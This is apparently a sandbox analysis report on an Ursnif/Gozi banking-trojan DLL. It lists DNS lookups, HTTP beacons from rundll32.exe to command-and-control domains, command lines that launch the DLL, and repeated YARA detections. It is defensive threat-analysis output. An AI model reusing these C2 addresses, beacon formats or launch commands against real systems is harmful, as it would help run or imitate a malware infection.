                  Oct 21, 2022 00:27:25.861325979 CEST5567353192.168.2.48.8.8.8
                  Oct 21, 2022 00:27:25.882078886 CEST53556738.8.8.8192.168.2.4
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Oct 21, 2022 00:25:29.478641987 CEST192.168.2.48.8.8.80x180aStandard query (0)onlinetwork.topA (IP address)IN (0x0001)false
                  Oct 21, 2022 00:25:39.180322886 CEST192.168.2.48.8.8.80xd013Standard query (0)onlinetwork.topA (IP address)IN (0x0001)false
                  Oct 21, 2022 00:25:40.999285936 CEST192.168.2.48.8.8.80x3dcdStandard query (0)onlinetwork.topA (IP address)IN (0x0001)false
                  Oct 21, 2022 00:25:44.133048058 CEST192.168.2.48.8.8.80xf19fStandard query (0)onlinetwork.topA (IP address)IN (0x0001)false
                  Oct 21, 2022 00:27:11.884556055 CEST192.168.2.48.8.8.80xdd20Standard query (0)linetwork.topA (IP address)IN (0x0001)false
                  Oct 21, 2022 00:27:20.512377977 CEST192.168.2.48.8.8.80xd8fStandard query (0)linetwork.topA (IP address)IN (0x0001)false
                  Oct 21, 2022 00:27:22.557136059 CEST192.168.2.48.8.8.80x4b6cStandard query (0)linetwork.topA (IP address)IN (0x0001)false
                  Oct 21, 2022 00:27:25.861325979 CEST192.168.2.48.8.8.80xe014Standard query (0)linetwork.topA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Oct 21, 2022 00:25:29.915838957 CEST8.8.8.8192.168.2.40x180aNo error (0)onlinetwork.top31.41.44.194A (IP address)IN (0x0001)false
                  Oct 21, 2022 00:25:39.373328924 CEST8.8.8.8192.168.2.40xd013No error (0)onlinetwork.top31.41.44.194A (IP address)IN (0x0001)false
                  Oct 21, 2022 00:25:41.308494091 CEST8.8.8.8192.168.2.40x3dcdNo error (0)onlinetwork.top31.41.44.194A (IP address)IN (0x0001)false
                  Oct 21, 2022 00:25:44.507917881 CEST8.8.8.8192.168.2.40xf19fNo error (0)onlinetwork.top31.41.44.194A (IP address)IN (0x0001)false
                  Oct 21, 2022 00:27:12.202425003 CEST8.8.8.8192.168.2.40xdd20No error (0)linetwork.top62.173.145.183A (IP address)IN (0x0001)false
                  Oct 21, 2022 00:27:20.531629086 CEST8.8.8.8192.168.2.40xd8fNo error (0)linetwork.top62.173.145.183A (IP address)IN (0x0001)false
                  Oct 21, 2022 00:27:22.746049881 CEST8.8.8.8192.168.2.40x4b6cNo error (0)linetwork.top62.173.145.183A (IP address)IN (0x0001)false
                  Oct 21, 2022 00:27:25.882078886 CEST8.8.8.8192.168.2.40xe014No error (0)linetwork.top62.173.145.183A (IP address)IN (0x0001)false
                  • linetwork.top
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.44974262.173.145.18380C:\Windows\SysWOW64\rundll32.exe
                  TimestampkBytes transferredDirectionData
                  Oct 21, 2022 00:27:12.300672054 CEST8777OUTGET /drew/fJ29sqPsP/PB4FnwvByjBglXFYEjZ1/hXe9prWt3B5GwuDq98v/uxK6HJV9Vv2hGb4_2BzE87/_2B7cwHJr4KZl/Z2JNy_2F/FQTy6SE98GzpaP4OycRAbeK/FNb75e_2BZ/vDSt33A5GpRAp0Wp5/3sRCo7L7mC_2/FRcDNZgk7ge/0DV7I1SHotZIJK/MawMR4TykLq9DH4qoWZqU/9lh5zRf0UXFuxlAr/44doOlzEgahzUed/pTo7pwfqznm_2FNsdD/ONqwlJdhn/hTW0RFx_2FoxngXj4_2B/7VTtckioJ/RQjhyCJh.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: linetwork.top
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.44974362.173.145.18380C:\Windows\SysWOW64\rundll32.exe
                  TimestampkBytes transferredDirectionData
                  Oct 21, 2022 00:27:20.607846022 CEST8779OUTGET /drew/bBjIYvLPS6LWM/5hSIaVH5/Wq734Z_2BJdIJMJo3F9GITO/_2FcMitcTe/kWvqzZ_2B_2FKKbPA/PasXIoBqTiXU/g_2FlZW7Y_2/B41HTf6QrjFt_2/BVrbTt4PzlSq49i2n_2Bd/eYvDRtuGLt_2Fv6B/tiuwwj_2BAQltrY/i8qwn6NTmmAuX65G3U/G0pEw9pKd/5FnOrAI7ls4u0lmSvnEp/39rOvZP_2BCYyBu8UVC/tWjDwJwf88LN44CDcCSZK_/2BvPg5_2BjQiD/eLQzVCVR/WPugjRuufv7WeRl3hdeCsRv/aT5ChRiLQy/6L.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: linetwork.top
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.44974462.173.145.18380C:\Windows\SysWOW64\rundll32.exe
                  TimestampkBytes transferredDirectionData
                  Oct 21, 2022 00:27:22.814107895 CEST8780OUTGET /drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGoQ/3iqH_2FJ2MwI/44xXh3ewHre/Z3uYW8oE7cSgpQ/KoDoLpaNqGjAzcl7PDDtU/W4U8yO0BLXfpg6Fg/1LkQrB_2FwF36_2/F24Alce0F3ZIABc8fP/582wfkRmY/YYSggLyv6WiREP5aRpD7/BrtAiO3VnPYflPLClgV/qChVx2f_2BaPtkYL4DoePx/ugW_2FeHancyO/tXrlnouq/Hh9J5BBA0FEI0HWw67W05n9/zd1N.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: linetwork.top
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  3192.168.2.44974562.173.145.18380C:\Windows\SysWOW64\rundll32.exe
                  TimestampkBytes transferredDirectionData
                  Oct 21, 2022 00:27:25.963476896 CEST8781OUTGET /drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/nIUnH5UJy/lraLufWTWWuSthVJSQnB/skwB6_2F4mYx1hncPnC/DX7TcGWo1RJRVk4zslIVLg/yTztrtFucPEpP/M0MfTI80/ZOv2XL0MhanRoGMyGX9uAoo/dmIzHKJR6c/gnzW6jLfOR7yWUymL/vvx15g4IZ4jD/aDLfgoeX_2F/HE40tKUB0xmnED/5US9_2FwaFREdIsGRoa7p/JuiKle06sqYmlLWx/l.jlk HTTP/1.1
                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                  Host: linetwork.top
                  Connection: Keep-Alive
                  Cache-Control: no-cache


                  Click to jump to process

                  Target ID:0
                  Start time:00:24:55
                  Start date:21/10/2022
                  Path:C:\Windows\System32\loaddll32.exe
                  Wow64 process (32bit):true
                  Commandline:loaddll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll"
                  Imagebase:0xf20000
                  File size:116736 bytes
                  MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.817394092.0000000001379000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343438473.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.817516370.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343171916.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343329790.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343470122.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343551363.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.343230461.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  Reputation:moderate

                  Target ID:1
                  Start time:00:24:55
                  Start date:21/10/2022
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff7c72c0000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:2
                  Start time:00:24:56
                  Start date:21/10/2022
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
                  Imagebase:0xd90000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Target ID:3
                  Start time:00:24:56
                  Start date:21/10/2022
                  Path:C:\Windows\SysWOW64\regsvr32.exe
                  Wow64 process (32bit):true
                  Commandline:regsvr32.exe /s C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll
                  Imagebase:0x70000
                  File size:20992 bytes
                  MD5 hash:426E7499F6A7346F0410DEAD0805586B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354124347.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.353972705.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354053342.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354175000.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354150298.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.353919364.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000002.817541038.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.817437989.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000003.00000003.354013304.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  Reputation:high

                  Target ID:4
                  Start time:00:24:56
                  Start date:21/10/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1
                  Imagebase:0xaf0000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347419865.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347302093.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347451141.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.817337923.00000000049B9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347355624.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000002.817517384.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000004.00000003.347162073.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  Reputation:high

                  Target ID:5
                  Start time:00:24:56
                  Start date:21/10/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll,DllRegisterServer
                  Imagebase:0xaf0000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.817370838.0000000004B09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322318617.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322083374.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322212571.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322029776.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000002.817470285.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000005.00000003.322295341.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                  Reputation:high

                  No disassembly